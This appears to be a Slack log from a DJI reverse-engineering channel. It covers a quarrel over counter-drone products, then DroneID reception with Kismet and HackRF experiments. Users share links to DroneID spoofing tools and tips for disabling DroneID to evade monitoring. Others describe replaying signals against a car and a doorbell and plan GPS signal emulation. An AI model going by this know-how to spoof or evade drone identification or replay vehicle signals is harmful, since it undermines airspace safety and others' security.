"but I can advise that I dont work for DJI, so you may wish to think again." that was of course a joke...
[2018-06-05 00:51:44]
hostile :
I am keen to know why you think you are "aware of where Mesmer is deployed" fwiw. =]
[2018-06-05 00:51:53]
sandwings247 :
I like the US Government Reference, this will be the easiest for me to confirm your comments
[2018-06-05 00:52:28]
hostile :
"I actually don't like Mesmer period", seems like your implicit bias makes a bit more sense. It was coming out in your initial commentary .
[2018-06-05 00:52:47]
sandwings247 :
So before I go back into my building, and start the process of chasing up your comments with USG, anything I need to know
[2018-06-05 00:53:08]
hostile :
"try to sell us Mesmer, every year, and every year we reject Mesmer".... ok..... good for you lol. I'm not fond of sales depts generally speaking.
[2018-06-05 00:53:23]
sandwings247 :
lol good re Sales Department
[2018-06-05 00:53:27]
hostile :
"Tell you what, show me your detection logs from Mesmer for actual Detects?"... yeahhhhhhhhh
[2018-06-05 00:53:34]
hostile :
check those government papers I guess
[2018-06-05 00:54:02]
hostile :
"AeroScope, it actually works against all DJI Quads" no it does not.... did they add P2 support recently?
[2018-06-05 00:54:24]
hostile :
"other 25-30% of NON DJI" again... when did they start doing non dji detects?
[2018-06-05 00:54:38]
hostile :
"full access." that is NOT full access to the SDK...
[2018-06-05 00:55:02]
sandwings247 :
There are no detects for NON DJI Quads, hence the other 25-30% that AeroScope doesn't cater for, are not a concern.
[2018-06-05 00:55:30]
hostile :
"There are no detects for NON DJI Quads" what does that even mean? no detects for Aeroscope or generally speaking?
[2018-06-05 00:56:05]
hostile :
"So before I go back into my building, and start the process of chasing up your comments with USG, anything I need to know" yeah... there is... stop acting so smug.
[2018-06-05 00:56:27]
hostile :
"this will be the easiest for me to confirm your comments".... hey you already have all the papers, what is left to confirm?
[2018-06-05 00:56:43]
hostile :
besides you don't "like" the product... so why bother
[2018-06-05 00:57:11]
sandwings247 :
I've already seen Mesmer results for testing, having been involved in such C-UAS events.
[2018-06-05 00:57:27]
hostile :
good for you... you saw a dated snapshot, and now know it all :wink:
[2018-06-05 00:57:33]
hostile :
have fun going back into your building
[2018-06-05 00:58:44]
sandwings247 :
LOL, oh no, you pissy now? You cant even give me one valid reason to show Mesmer is better than any other C-UAS system on the market today?
[2018-06-05 00:59:11]
hostile :
"it actually works against all DJI Quads"... let me know how well it works when you spoof a pile of drones at it <https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof>
[2018-06-05 00:59:37]
hostile :
not at all.. I'm always "hostile"... but I don't take kindly to folks with a chip on their shoulder IMHO talking out the side of their face as if they are an authority on something they clearly are not.
[2018-06-05 00:59:48]
hostile :
"You cant even give me one valid reason to show Mesmer" I don't need to...
[2018-06-05 00:59:53]
hostile :
I'm not the sales department that is calling you
[2018-06-05 01:00:03]
hostile :
and IF you were calling ME with that jive I'd tell you exactly where to go...
[2018-06-05 01:00:11]
hostile :
and that would be to have fun with your pile of Aeroscopes
[2018-06-05 01:00:25]
sandwings247 :
I have more than AeroScope
[2018-06-05 01:00:30]
hostile :
good...
[2018-06-05 01:00:36]
sandwings247 :
Corian
[2018-06-05 01:01:00]
sandwings247 :
I don't work for BITS or CACI either
[2018-06-05 01:01:04]
hostile :
"You cant even give me one valid reason to show why Corian is better than any other C-UAS system on the market today" :wink:
[2018-06-05 01:01:11]
hostile :
I could care less who you work for TBH
[2018-06-05 01:01:34]
hostile :
Aeroscope only works because of DroneID... and that implementation is trash
[2018-06-05 01:01:36]
hostile :
period
[2018-06-05 01:01:40]
sandwings247 :
LOL this is the best chat I've had all do
[2018-06-05 01:01:49]
sandwings247 :
day not do
[2018-06-05 01:02:42]
hostile :
cool... well have fun in Corian's world bro! Time to put my son to bed
[2018-06-05 01:03:18]
hostile :
and find yourself another throwaway email address to make your way back in. **shrug**
[2018-06-05 06:11:04]
mathieu.peyrega :
@ender did you have enough popcorn? I love those US TV shows but they are really broadcast too late here, and the replay doesn't always have the same taste...
[2018-06-05 06:14:50]
hostile :
yeah ain't no one got time for that
[2018-06-05 06:15:16]
hostile :
most of the spooky folks in here keep to their business. I'm not all about someone in here mouthing off like they are holding ME up from a sale.
[2018-06-05 06:15:18]
hostile :
F that
[2018-06-05 06:15:30]
hostile :
welcome to the short ban list
[2018-06-05 06:15:31]
hostile :
heh
[2018-06-05 12:52:17]
ender :
Yup, Popcorn was yummie :wink:
[2018-06-05 12:53:24]
validat0r :
why did you kick him?
[2018-06-05 13:37:07]
hostile :
because he was the kind of troll that I'm simply not going to allow here. One claiming to be operating in the space of **using** commercial CUAS platforms, and implying he is part of the groups that do CUAS testing for .mil / .gov, etc. That is all fine, but don't come into **my** home saying "I don't like the product you make" sans any technical info as to why, etc. Then to be basically DJI sympathetic (was strange). And of course our product as any will have its short comings, but he seemed slightly misinformed, but dangerous enough to know **some** stuff as it were.
[2018-06-05 13:40:02]
validat0r :
So Mesmer is the A-UAV product of D13?
[2018-06-05 13:40:08]
hostile :
yes
[2018-06-05 13:40:54]
validat0r :
comes with a shoulder mounted raygun?
[2018-06-05 13:42:30]
hostile :
lol No!
[2018-06-06 03:02:59]
lolo780 :
Wow mr sandwings sure has an attitude
[2018-06-06 03:57:11]
hostile :
yeah not exactly sure where he thought he was lol
[2018-06-06 13:03:36]
eseven :
Oh man! Even with your opponents, you have a chance to get knowledge on how to improve a product...
[2018-06-06 13:06:02]
mathieu.peyrega :
lol, you mean even when the opponent tells "I don't like what you do. period" ?
[2018-06-06 13:07:52]
hostile :
lol @miliu00 I’m well aware of the limitations of the product. I already drive the QA team nuts. :wink: This guy was playing with dated info and a chip on his shoulder. Ain’t no one got time for that
[2018-06-06 13:34:32]
eseven :
I completely agree on not wasting time with trolls! At least on the droneid thread where there will be only technical information exchange.
[2018-06-08 21:45:47]
kyokushin :
From which version did these sliders appear? I can't find them in 4.1.22 and 4.1.3. Also I was unable to find them in 4.1.14.
[2018-07-05 02:14:58]
ben_lin :
Is there a way to completely disable droneId?
[2018-07-05 02:14:58]
ben_lin :
Any documentation on this?
[2018-07-05 02:28:26]
ben_lin :
I remember @hostile you were talking about spoofing it…
[2018-07-05 02:55:48]
hostile :
attach this to your drone =] <https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie>
[2018-07-05 02:55:58]
hostile :
or run this on a raspi <https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof>
[2018-07-05 02:56:11]
hostile :
depends on the bird... but you need to neuter the kernel modules
[2018-07-05 02:56:27]
hostile :
someone in here patched one of the dji_* libraries to not relay it on too
[2018-07-05 02:56:32]
hostile :
dji_hdtv or what ever it was
[2018-07-05 03:01:11]
validat0r :
dji_network
[2018-07-05 08:11:15]
ben_lin :
lmao
[2018-07-05 08:11:29]
ben_lin :
imma test this shit in Beijing
[2018-07-05 09:42:15]
validat0r :
is droneid monitored in beijing?
[2018-07-05 11:58:38]
hostile :
HEAVILY
[2018-07-05 11:58:42]
hostile :
even more so than in the states
[2018-07-05 11:58:56]
hostile :
you can get real name and phone number of .cn folks
[2018-07-05 11:59:05]
hostile :
via a serial number API
[2018-07-05 12:07:36]
validat0r :
holy shit
[2018-07-05 12:08:54]
jezzab :
**cough** UUID **cough**
[2018-07-05 12:10:06]
validat0r :
?
[2018-07-05 12:24:23]
hostile :
your uniquely identifiable user id ...
[2018-07-05 12:24:30]
hostile :
can be used to make these queries
[2018-07-05 12:28:23]
validat0r :
I have a user id? can't imagine
[2018-07-05 13:30:24]
hostile :
lol everyone does
[2018-07-05 13:30:30]
hostile :
if you use DJI go, you have a uuid
[2018-07-05 13:30:45]
hostile :
when you login the first time, it is associated with your email address
[2018-07-05 13:38:20]
jezzab :
FC might even hold the last 5... date, time etc... ;)
[2018-07-05 13:39:07]
jezzab :
Be afraid
[2018-07-05 13:45:01]
validat0r :
I never logged in to DJI .. nor have an account there
[2018-07-05 13:45:09]
validat0r :
hence no UUID
[2018-07-05 13:45:23]
ben_lin :
Welp I guess I need to figure this out
[2018-07-05 13:47:29]
ben_lin :
Wait, is DroneID controlled by the FC or DJIGO?
[2018-07-05 13:47:58]
validat0r :
by the dji_network process on the AC
[2018-07-05 13:48:36]
ben_lin :
So with root access we can get in there and permanently remove it?
[2018-07-05 13:50:17]
jezzab :
Anything is possible
[2018-07-05 13:50:33]
ben_lin :
:?
[2018-07-05 13:50:55]
ben_lin :
Wonder which module is responsible for this
[2018-07-05 13:51:10]
ben_lin :
If it is the FC module then I am good…
[2018-07-05 13:51:37]
validat0r :
you're confusing things
[2018-07-05 13:52:01]
ben_lin :
? Is it not part of the firmware?
[2018-07-05 13:53:14]
validat0r :
sure
[2018-07-05 13:59:08]
hostile :
depends on the bird, but basically either radio firmware, or wifi kernel module is responsible, and I think dji_network handles some of the information relay
[2018-07-05 14:00:04]
hostile :
roll pitch yaw will be pulled from FC of course
[2018-07-05 14:01:35]
ben_lin :
:( So much work to do just to enjoy a quad
[2018-07-05 14:21:43]
ben_lin :
@hostile Do you think NLD would be able to add an aeroscope patch in the future?
[2018-07-05 14:21:56]
ben_lin :
To simply disable it
[2018-07-05 14:30:30]
hostile :
@coldflake...
[2018-07-05 14:56:26]
ben_lin :
.
[2018-07-05 15:06:30]
hostile :
@ben_lin (he manages that codebase)
[2018-07-05 15:10:53]
nocommie :
Better yet, the option to enter whatever text/location you want displayed.
[2018-07-05 15:11:59]
validat0r :
that should be way more difficult .. :smile:
[2018-07-10 14:54:14]
mathieu.peyrega :
Hi, does anyone have an idea of kismet support level on raspberry pi 3B+ (the new one that supports 5GHz) ?
[2018-07-10 14:54:36]
mathieu.peyrega :
will it handle droneId correctly ?
[2018-07-10 15:29:35]
hostile :
as long as you have an atheros m.2. / pci card...
[2018-07-10 15:29:42]
hostile :
if it isn't atheros... it isn't happening
[2018-07-10 15:30:04]
hostile :
you can spoof from a pi , but not receive it
[2018-07-10 15:42:15]
mathieu.peyrega :
thanks... i have one of these :<http://www.shuttle.eu/fileadmin/resources/download/docs/spec/barebones/DS67U7_e.pdf>
will go find a good replacement card for it...
[2018-07-10 15:42:42]
mathieu.peyrega :
I already replaced the one in my laptop to support triple boot...
[2018-07-10 16:03:09]
mathieu.peyrega :
found a used Atheros qca6174a-5
[2018-07-10 16:03:17]
mathieu.peyrega :
hope that will fit and do the job
[2018-07-10 20:48:38]
eseven :
Ar92xx with different flavors....
[2018-07-12 01:34:05]
antihawk :
@antihawk has joined the channel
[2018-07-13 21:05:20]
aciid :
what frequency does droneid show up on?
[2018-07-13 21:15:51]
hostile :
the c2 link of the bird you are using.
[2018-07-13 21:15:57]
hostile :
aka if you fly wifi it shows on wifi
[2018-07-13 21:16:04]
hostile :
if you fly occusync, it shows on occusync
[2018-07-13 23:22:21]
aciid :
@hostile ok thanks, going to dig into the basics of this today.
[2018-07-14 14:20:49]
aciid :
@mathieu.peyrega does interfacing with droneid require a specific type of device? I have a well known and supported Ralink RT3572 (ALFA AWUS051NH v2), and couldn't see shit
[2018-07-14 14:20:58]
aciid :
im just learning about this
[2018-07-14 14:22:01]
mathieu.peyrega :
i'm also learning in that field... it seems the Wifi chip needs to be Atheros brand and not a USB one (PCIe i.e. internal...)
[2018-07-14 14:22:31]
mathieu.peyrega :
@hostile is guru there... I guess @atlas is kind of one too
[2018-07-14 14:22:47]
mathieu.peyrega :
I ordered recently a wifi card that should work but have not received it yet
[2018-07-14 14:23:13]
aciid :
I have realtek and ralink chips. I think I have an atheros somewhere too, have to dig around
[2018-07-14 14:23:27]
aciid :
does the data show up on kismet or do you need some other app?
[2018-07-14 14:30:07]
aciid :
found an Atheros dwa-574 in the drawer
[2018-07-14 14:30:12]
aciid :
brb booting to attach this
[2018-07-14 14:34:32]
aciid :
and it was a PCI-card
[2018-07-14 14:34:34]
aciid :
not PCIe
[2018-07-14 14:34:36]
aciid :
so nope
[2018-07-14 14:34:43]
aciid :
going to [amazon.de](http://amazon.de)
[2018-07-14 14:36:09]
validat0r :
shows up on kismet .. you need to switch to 5 MHz wide channels
[2018-07-14 14:39:42]
aciid :
I probably have this in garage <https://wikidevi.com/wiki/ALFA_Network_AWUS036NHA>
[2018-07-14 14:40:05]
validat0r :
5 GHz is sometimes tricky. you could switch to 2.4 GHz and try again.
[2018-07-14 14:40:31]
validat0r :
and you need latest Kismet from github
[2018-07-14 21:33:56]
aciid :
is the bssid a part of mavics serial number?
[2018-07-14 21:34:19]
aciid :
what im asking is any identifiable data going unencrypted
[2018-07-16 00:04:07]
hostile :
@aciid ONLY the ath9k works for droneid wifi... due to the 5 MHz channel special stuff.
[2018-07-16 00:04:21]
hostile :
MUST be Pci, or M.2 format card.
[2018-07-16 00:04:47]
hostile :
you then need to change the kismet conf to add the 5 MHz channels
[2018-07-16 03:36:31]
aciid :
thanks ill start looking for this kind of a card
[2018-07-17 15:53:48]
hostile :
set the channel topic: a known working Atheros ath9k is
Atheros QCNFA222 AR5BWB222
[2018-07-18 16:56:43]
mathieu.peyrega :
<https://www.entreprises.gouv.fr/files/files/directions_services/numerique/consultations-publiques/2018-06-01-Synthese-consult-drones.pdf>
[2018-07-18 16:56:57]
mathieu.peyrega :
result for the public consultation about the French droneId project
[2018-07-18 18:38:57]
hostile :
```Summary of contributions received during the public consultation Texts relating to civil drones
Under Article L. 32-1 V of the Post and Electronic Communications Code, the DGE conducted a public consultation online, from April 13 to May 5, 2018.
This consultation was the subject of 89 contributions: 10 contributions from operators and federations and 79 contributions from individual model aircraft. Almost all of these contributions expressed strong reservations on several points of the texts submitted for consultation.
1 - Electronic reporting (draft decree and order):
The contributions received focused on the following points:
a) Legal aspects
- the entry into force of the national texts coincides with the preparation of the European regulation on the same subject, which risks creating instability of the regulation even contradictions;
- the deadlines for the implementation of the texts are considered unsuitable with regard to the duration of the production cycle of a drone;
- maladjustment of the texts to the model aircraft activity: it was recommended to distinguish between model aircraft controlled by sight which should be exempted from regulation and not controlled by sight which would be subject to regulation. It was also recommended that the exemptions should not be limited to only aeromodelists practicing in nationally recognized federations.
b) Technical aspects
- the risk of interference with other equipment using wifi;
- the potential for interference between UAV control systems and electronic reporting devices using the same frequency band;
- the risk of imbalance of the device and loss of autonomy related to the addition of an add-on;
- securing and encrypting the transmission of GPS data;
- it was recommended that the identification number be that of the manufacturer of the drone in accordance with the European text.
07/10/2018
2 - The luminous signaling (draft decree and decree):
The contributions received focused on the following points:
a) Legal aspects
- the entry into force of the national texts coincides with the preparation of the European regulation on the same subject, which risks creating instability of the regulation even contradictions;
- the deadlines for the implementation of the texts are considered unsuitable with regard to the duration of the production cycle of a drone;
- maladjustment of the texts to the model aircraft activity: it was recommended to distinguish between model aircraft controlled by sight which should be exempted from regulation and not controlled by sight which would be subject to regulation. It was also recommended that the exemptions should not be limited to only aeromodelists practicing in nationally recognized federations.
b) Technical aspects
- it was recommended to choose a color for the signaling light;
- the code U in Morse has been considered too complicated to implement in view of its usefulness;
- the luminous device was considered superfluous and not very useful with regard to electronic reporting and security needs;
- it was recommended to limit the obligation to use a reporting device to only night flights;
- the risks of imbalance and loss of autonomy induced by the addition of a light device.
3 - The mass threshold (draft simple decree):
The contributions received focused on the following points:
- the fact that these texts have a particular impact on the model aircraft because of the chosen mass threshold;
- the contradiction with the European regulation which sets a threshold at 900 grams.```
[2018-07-18 18:51:32]
aciid :
silly morse signals lol
[2018-07-18 18:52:18]
aciid :
I think they will just restrict the overall weight of the drones so they cant push payload into prison etc
[2018-07-18 18:53:01]
aciid :
"cant" is wrong word.
[2018-07-20 17:21:37]
mathieu.peyrega :
Hi, received my pcie... but it's an ath10k driver chip and not ath9k, will it be ok ?
[2018-07-20 20:17:25]
makingthisnameup :
Wait wait we can't drop payloads into prisons anymore? Whutoh.
[2018-07-20 20:22:36]
makingthisnameup :
They should put up a sign of some sort
[2018-07-21 15:32:24]
hostile :
@mathieu.peyrega I can't recall if ath10k is close enough to ath9k that it can also tune to 5 MHz
[2018-07-21 15:32:42]
hostile :
try this:
[2018-07-21 15:32:44]
hostile :
source=wlan10k0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2018-07-21 15:32:47]
mathieu.peyrega :
I'm going to test this afternoon
[2018-07-21 15:32:52]
hostile :
see if it works in your kismet config
[2018-07-21 15:33:27]
mathieu.peyrega :
i'm in my RF discovery days :slightly_smiling_face: (been buying a hackrf one too and playing with it, but the vendor messed up and sent me a 22.625 TCXO instead of 10 MHz so I can't play with GPS stuff)
[2018-07-21 15:33:30]
hostile :
set the channel topic: a known working Atheros ath9k is
Atheros QCNFA222 AR5BWB222 you also MUST change the channel list: source=wlan0:add_channels="149W5,153W5,157W5,161W5,165W5,151W5,155W5,159W5,163W5,153W5,1W5,2W5,3W5,4W5,5W5,6W5,7W5,8W5,9W5,10W5,11W5,12W5,13W5,14W5"
[2018-07-21 15:51:11]
mathieu.peyrega :
do those settings go on the cmdline args or in the config file ?
[2018-07-21 15:51:26]
hostile :
in the kismet config file
[2018-07-21 15:51:37]
hostile :
either kismet.conf or kismet_site.conf
[2018-07-21 15:51:49]
mathieu.peyrega :
thx
[2018-07-21 15:56:57]
aciid :
<https://www.aliexpress.com/item/HackRF-One-usb-platform-reception-of-signals-RTL-SDR-Software-Defined-Radio-1MHz-to-6GHz-software/32808682100.html>? I bought this from here
[2018-07-21 16:23:46]
mathieu.peyrega :
getting errors "could not set any channel"... after a clean compile (including erasing old config files)
[2018-07-21 16:33:03]
validat0r :
Yeah. Some channels will disappear after a while. The question is if some channels will remain
[2018-07-21 16:33:21]
mathieu.peyrega :
none appear here...
[2018-07-21 16:33:51]
mathieu.peyrega :
ath10k is reported to have issues in the readme...
[2018-07-21 16:34:08]
hostile :
yeah ath10k driver is shit
[2018-07-21 16:34:12]
hostile :
lots of spurious data
[2018-07-21 16:34:17]
hostile :
bad FCS
[2018-07-21 16:34:19]
mathieu.peyrega :
I thought I ordered an ath9k... not for the 5€ but they take ages to get delivered
[2018-07-23 19:30:32]
mathieu.peyrega :
playing with hackRF... I understand the "U" and "O" i'm getting in the console, but I also get "a" and am not finding what this means ? anyone have an idea ?
[2018-07-23 19:30:47]
aciid :
which app are you referring to?
[2018-07-23 19:31:10]
aciid :
I have hackRF too, and an antenna I've "set to 2.4ghz" , can we be friends and try to figure droneid out together?
[2018-07-23 19:31:17]
mathieu.peyrega :
gnuradio companion
[2018-07-23 19:31:27]
mathieu.peyrega :
UaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaUaU
[2018-07-23 19:32:23]
aciid :
I can't get hackRF and gnuradio companion to work in Windows
[2018-07-23 19:32:56]
mathieu.peyrega :
I'm really "new" to those RF things... going through the Mike Ossmann video course atm... Just figured out how I/Q representation links to real signal power... (something I never understood before !!) so maybe it's a little early for me to tackle droneId with this
[2018-07-23 19:33:10]
mathieu.peyrega :
but I hope to grab more skills and be able to help !
[2018-07-23 19:33:47]
aciid :
which platform are you on where GNUradio works with hackrf?
[2018-07-23 19:33:52]
aciid :
I have VM's and a mac and stuff
[2018-07-23 19:33:57]
mathieu.peyrega :
Ubuntu Mate 18.04
[2018-07-23 19:34:11]
mathieu.peyrega :
I can try on Windows 2...
[2018-07-23 19:34:25]
aciid :
it's not working for me, doesn't list in osmocom
[2018-07-23 19:34:28]
mathieu.peyrega :
I've been able to set up a few things on the Windows boot but did not try gnu radio yet
[2018-07-23 19:34:30]
aciid :
which is the driver
[2018-07-23 19:34:34]
aciid :
yeah don't bother
[2018-07-23 19:34:39]
aciid :
linux is better
[2018-07-23 19:35:31]
mathieu.peyrega :
been trolling kids with doorbell replay :slightly_smiling_face:
[2018-07-23 19:36:10]
mathieu.peyrega :
now trying to have the roof window shutter controlled, but seems the simple replay is not working
[2018-07-23 19:36:12]
aciid :
hey youve done more than me then
[2018-07-23 19:36:45]
mathieu.peyrega :
the replay against my car works if the car did not grab the signal at first...
[2018-07-23 19:36:59]
mathieu.peyrega :
already this is quite amazing I think
[2018-07-23 19:37:35]
mathieu.peyrega :
I can pretty much check when a phone call takes place
[2018-07-23 19:37:47]
mathieu.peyrega :
(very few antennas around my place)
[2018-07-23 19:38:17]
aciid :
i use a 0-6ghz "radio" antenna that is set to 2.34feet
[2018-07-23 19:38:22]
aciid :
to get 2400mhz
[2018-07-23 19:40:43]
mathieu.peyrega :
initial thing I wanted to play with was emulating GPS signal, but I do not have the correct TCXO yet... vendor messed up
[2018-07-23 19:42:42]
aciid :
I got a clock chip with my order
[2018-07-23 19:42:46]
aciid :
this thing that sits on top
[2018-07-23 19:43:14]
mathieu.peyrega :
right, mine is 22.625 MHz instead of 10 MHz
[2018-07-23 19:43:25]
mathieu.peyrega :
so not usable...
[2018-07-23 19:44:19]
aciid :
mine says txco 10.000000mhz
[2018-07-23 19:44:43]
aciid :
not correct I assume?
[2018-07-23 19:44:47]
aciid :
it came from aliexpress
[2018-07-23 19:51:04]
aciid :
@mathieu.peyrega ok i got hackrf working with Ubuntu 16.04 + gnuradio companion
[2018-07-23 19:53:27]
aciid :
<https://www.scip.ch/en/?labs.20170622>
[2018-07-23 19:53:51]
aciid :
this should work with gnuradio companion too
[2018-07-23 19:59:34]
mathieu.peyrega :
this one : <https://github.com/pavsa/hackrf-spectrum-analyzer> works pretty well
[2018-07-23 19:59:35]
mathieu.peyrega :
<https://github.com/pavsa/hackrf-spectrum-analyzer>
[2018-07-23 21:52:26]
jezzab :
`sudo apt-get install gr-osmosdr` from memory. You have to install it
[2018-07-23 21:53:15]
aciid :
I installed pothosware SDR package, <https://github.com/pothosware/PothosCore/wiki/Ubuntu>
[2018-07-23 21:54:02]
aciid :
thanks!
[2018-07-23 23:51:24]
fredmicrowave :
Many garage door and similar remote control systems use rolling code. In such cases replaying the TX code will not work...
[2018-07-24 15:37:39]
mathieu.peyrega :
amazing !
[2018-07-24 15:42:03]
hostile :
man I can remember this feeling
[2018-07-24 15:42:07]
hostile :
haha congrats bro
[2018-07-24 15:42:20]
hostile :
next ephemeris data, then conquering the world!
[2018-07-24 15:43:23]
aciid :
woah which antenna is that with?
[2018-07-24 15:44:40]
mathieu.peyrega :
it's with this antenna : <https://www.tersus-gnss.com/product/antenna-ax3705>
but as a surveyor and gnss lover, I have a bunch of different antennas here...
[2018-07-24 15:44:52]
mathieu.peyrega :
I even have some I'd better sell
[2018-07-24 15:47:10]
aciid :
$160
[2018-07-24 15:47:11]
aciid :
uuff
[2018-07-24 15:48:05]
mathieu.peyrega :
it's because it's L1+L2
[2018-07-24 15:48:22]
mathieu.peyrega :
you can find cheap L1 only active antenna that would probably work too...
[2018-07-24 15:48:25]
mathieu.peyrega :
will try one later
[2018-07-24 15:48:40]
mathieu.peyrega :
it's upstairs in the cavern and i'm lazy
[2018-07-24 15:59:15]
aciid :
I have some automotive grade GPS antennas here
[2018-07-24 15:59:39]
aciid :
<https://www.adafruit.com/product/960> these
[2018-07-24 15:59:56]
aciid :
looks like that but I dont think its boosted
[2018-07-24 16:06:58]
aciid :
found my TELIT XE910 module antennas
[2018-07-24 16:07:27]
aciid :
AMOTECH AGA363913-S0-A5
[2018-07-24 16:37:05]
mathieu.peyrega :
just for the record of you hackrf users... I had to do this : <https://unix.stackexchange.com/questions/91027/how-to-disable-usb-autosuspend-on-kernel-3-7-10-or-above>
to disable autosuspend on USB on my laptop, otherwise the hackrf was not detected consistently...
[2018-07-24 16:37:30]
mathieu.peyrega :
@mathieu.peyrega uploaded a file: [Sans titre](https://dji-rev.slack.com/files/U84HERNVC/FBX56RYQ7/-.pl)
[2018-07-24 16:38:45]
mathieu.peyrega :
@aciid ; gnss-sdr also works with a basic low cost L1 only antenna like this one : <https://www.amazon.fr/Antenne-Distance-Adaptateur-Connecteur-1575-42MHz/dp/B074V12W73/ref=sr_1_4?ie=UTF8&qid=1532450296&sr=8-4&keywords=antenne+GPS+sma>
[2018-07-24 16:42:11]
aciid :
i think this works, which I have, but I need to install gnss-sdr. i have a custom gr-osmosdr so i need to make a new virtual machine
[2018-07-24 16:42:23]
aciid :
pothosware SDR did that fckup
[2018-07-24 19:22:52]
mathieu.peyrega :
playing also with shinysdr at times...
[2018-07-24 19:22:56]
mathieu.peyrega :
this is amazing !
[2018-07-24 19:23:20]
mathieu.peyrega :
@mathieu.peyrega uploaded a file: [image.png](https://dji-rev.slack.com/files/U84HERNVC/FBXH82UMU/image.png)
[2018-07-24 22:43:56]
jakub :
@mathieu.peyrega what RX you are using atm?
[2018-07-25 21:59:28]
aciid :
I used hostile's nodeMCU code for droneID
[2018-07-25 21:59:31]
aciid :
god damn that thing is loud
[2018-07-25 22:00:26]
aciid :
i tried decoding it, but it went off the charts
[2018-07-25 22:00:38]
aciid :
probably need to have it somewhere else than on my desk
[2018-07-31 23:23:10]
aciid :
@sami.keskinen
[2018-07-31 23:23:13]
sami.keskinen :
@sami.keskinen has joined the channel
[2018-08-02 08:36:10]
aciid :
woo my Atheros ath9k arrived
[2018-08-02 08:38:42]
validat0r :
cool. please test and report :slightly_smiling_face:
[2018-08-02 08:43:54]
aciid :
I will, I have a laptop in the garage I'll fit this into, my workhorse doesn't have slots
[2018-08-02 08:44:40]
validat0r :
which card model is it?
[2018-08-02 08:47:45]
aciid :
<https://www.ebay.com/itm/Atheros-QCNFA222-AR5BWB222-802-11a-b-g-n-2-4-5GHz-BT4-0-WIFI-WLAN-Card-4K380-M-2/272410262909?ssPageName=STRK%3AMEBIDX%3AIT&_trksid=p2057872.m2749.l2649>
[2018-08-02 08:47:59]
aciid :
<https://www.ebay.com/itm/M-2-NGFF-to-Mini-PCI-E-Adapter-Converter-for-Intel-9260-9560-8265-WIFI-Module/282933753147?ssPageName=STRK%3AMEBIDX%3AIT&_trksid=p2057872.m2749.l2649>
[2018-08-02 08:48:02]
aciid :
same seller
[2018-08-02 09:43:47]
aciid :
I hope U.FL is the same size on M.2 boards as on mPCIe
[2018-08-02 10:27:28]
ender :
it usually ALWAYS is !
[2018-08-02 11:58:15]
aciid :
I'm going to get the laptop now to fit that
[2018-08-02 14:44:17]
aciid :
@hostile I get "Packet source wlan0mon failed to set channel 14 mac80211_setchannel could not set channel 14/2484." but most of the custom channels in your list work, I'm using kali kismet
[2018-08-02 14:44:35]
hostile :
that is fine
[2018-08-02 14:44:40]
hostile :
some cards can't tune to certain channels
[2018-08-02 14:44:44]
hostile :
and kismet auto kicks them out
[2018-08-02 14:45:00]
validat0r :
do you see droneids?
[2018-08-02 14:45:01]
hostile :
sounds like you are up now?
[2018-08-02 14:45:20]
aciid :
yup just got everything configured, starting RC and AC now
[2018-08-02 14:45:21]
hostile :
you should at least see the WEP adhoc connection
[2018-08-02 14:45:31]
validat0r :
set to 5 MHz chans
[2018-08-02 14:45:56]
aciid :
I used the line we have on topic which had n-chanW5 per channel
[2018-08-02 14:46:03]
validat0r :
ok
[2018-08-02 14:46:05]
aciid :
does that do the trick
[2018-08-02 14:46:08]
aciid :
or is there more parameters
[2018-08-02 14:46:12]
hostile :
as long as the interface name matches
[2018-08-02 14:46:15]
hostile :
you should be good
[2018-08-02 14:46:57]
aciid :
it should, I added the channellist to config via "channellist=DJI:nönönönönönönnönö"
then started kismet
kismet -c wlan0mon:channellist=DJI
[2018-08-02 14:47:08]
validat0r :
props have to spin to make the ac emit droneids
[2018-08-02 14:47:31]
aciid :
acknowledged, I'll take the props off
[2018-08-02 14:47:52]
validat0r :
wise precaution
[2018-08-02 14:48:03]
aciid :
ye I have 2 cats
[2018-08-02 15:02:40]
aciid :
it's not working, or do I have to have DroneID enabled from the DJI GO4 app?
[2018-08-02 15:02:51]
aciid :
I don't have my phone connected at all to the RC now
[2018-08-02 15:04:26]
validat0r :
to rule out problems on 5 GHz, you could set the AC-RC connection to 2.4 GHz .. that way I was able to see packets with my ancient T41p wifi card
[2018-08-02 15:04:56]
aciid :
I'll connect my phone then
[2018-08-02 15:05:42]
validat0r :
from what I understand you can't really switch droneid off (on recent firmwares at least)
[2018-08-02 15:05:54]
aciid :
this is a recent one yeah
[2018-08-02 15:05:57]
aciid :
and stock iOS app
[2018-08-02 15:06:13]
validat0r :
(well you can, but not when dji gets its way)
[2018-08-02 15:08:06]
aciid :
must be some other problem
[2018-08-02 15:09:10]
aciid :
maybe my notation on channelwidth is wrong
[2018-08-02 15:10:51]
validat0r :
there should be plenty of xxW5 channels listed in kismet when you start .. (and some of them will probably grey out after a couple of minutes)
[2018-08-02 15:12:14]
validat0r :
droneid packets will list as "WiFi Adhoc"
[2018-08-02 15:12:40]
hostile :
@aciid you should see the bare mac addresses of the cards in adhoc mode ...
[2018-08-02 15:12:46]
hostile :
don't worry about "droneid" yet
[2018-08-02 15:12:50]
hostile :
do you see the adhoc?
[2018-08-02 15:13:11]
hostile :
show me a picture of your kismet interface
[2018-08-02 15:13:23]
hostile :
and you are using kismet from git, right?
[2018-08-02 15:18:39]
aciid :
not from git , could be a problem
[2018-08-02 15:22:03]
validat0r :
yeah .. you need the version from git
[2018-08-02 15:23:24]
aciid :
I'll get back on this after it compiles
[2018-08-02 15:31:23]
hostile :
yeah MUST be from git
[2018-08-02 15:38:12]
aciid :
gonna make me a sandwich, it's taking a while to compile
[2018-08-02 16:25:29]
validat0r :
dont see any dji device
[2018-08-02 16:25:33]
aciid :
me neither
[2018-08-02 16:26:08]
aciid :
sure that this is enabled in european union?
[2018-08-02 16:26:24]
validat0r :
you think they make that GPS dependent?
[2018-08-02 16:26:40]
validat0r :
well on spark they dont
[2018-08-02 16:26:45]
aciid :
well it's not getting GPS fix on AC and no homepoint when I'm inside
[2018-08-02 16:26:50]
aciid :
should I go try outside?
[2018-08-02 16:27:11]
validat0r :
you could try
[2018-08-02 16:27:35]
aciid :
I'll go, seems funny, I have the chipset that hostile recommended
